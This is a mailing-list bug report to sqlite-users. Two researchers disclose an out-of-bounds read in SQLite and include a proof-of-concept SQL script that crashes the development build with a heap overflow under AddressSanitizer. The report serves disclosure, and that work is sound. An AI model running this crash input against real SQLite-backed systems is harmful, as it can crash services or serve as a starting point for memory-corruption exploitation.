Hi,
We found a oob read in sqlite. Here’s the PoC:
—
CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ;
CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ;
CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1 ) ,( ''
) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' ) FROM v0 ;
—
When we run it with sqlite compiled with asan, we got a heap overflow crash.
The bug exists in the latest development code.
Yongheng & Rui
_______________________________________________
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
